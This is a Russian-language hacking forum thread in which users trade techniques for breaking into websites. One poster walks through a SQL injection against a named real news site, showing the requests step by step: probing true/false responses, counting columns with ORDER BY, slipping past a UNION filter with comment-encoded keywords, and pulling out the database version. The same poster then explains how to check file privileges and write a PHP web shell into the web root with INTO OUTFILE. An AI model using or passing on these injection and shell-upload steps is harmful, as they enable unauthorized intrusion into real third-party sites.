
03.01.2012, 14:08
|
|
Постоянный
Регистрация: 12.11.2010
Сообщений: 322
С нами:
8157206
Репутация:
-3
|
|
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP
Сообщение от None
If you are the webmaster of this site make sure that:
* You have uploaded correctly your files to the public_html directory which is the web-root of your account;
* You have not misspelled the URL. Bear in mind that letters are case sensitive and no blank spaces are recommended;
* In case you have applied SEO - SEF URL rewrite rules, make sure you have renamed the htaccess.txt file to .htaccess. If there is already a non-empty .htaccess file, check it and make sure the necessary rules are uncommented.
|
|
|

03.01.2012, 14:10
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от AlonDelon
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP
Инглиш бро. Криво установлено все.
|
|
|

03.01.2012, 15:28
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
|
|
|

03.01.2012, 15:41
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от er9j6@
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
Код:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title 5.1.33-log
Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто
|
|
|

03.01.2012, 15:56
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от Ereee
Код:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title
5.1.33-log
Вот так бро
А то в поиске заморочки с LIKE. Вообщем все гениальное просто
как ты количество полей подобрал, каким запросом?
|
|
|

03.01.2012, 16:01
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от er9j6@
как ты количество полей подобрал, каким запросом?
Тут главное внимательность.
http://1cnews.com/index.php?mode=viewpart&part=10
Делаем запрос:
http://1cnews.com/index.php?mode=viewpart&part=10'
В заголовке исчезает "Events of the branch". Что то тут не так
Проверяем на inj.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1
"Events of the branch" появился. А если:
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2
Исчез. Соответственно, true и false.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+1 0--+f
Заголовок исчез.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f
Пояивлся, соответственно, кол-во 3.
Ну а дальше
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+sele ct+1,2,3--+f
403 forbidden
Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/
Пробуем
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f
Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.
P.S. Вообщем контент-based injection
|
|
|

03.01.2012, 17:48
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами:
8155766
Репутация:
2
|
|
Есть доступ к бд как залить shell ?
|
|
|

03.01.2012, 17:52
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Groove
Есть доступ к бд как залить shell ?
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php
|
|
|

03.01.2012, 17:56
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами:
8155766
Репутация:
2
|
|
Сообщение от Ereee
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
|
|
|

03.01.2012, 18:27
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Groove
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
Ты про это наверно:
PHP код:
[COLOR="#000000"]select '[COLOR="#0000BB"][/COLOR]' into outfile '/path/to/www/dir/file.php'[/COLOR]
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|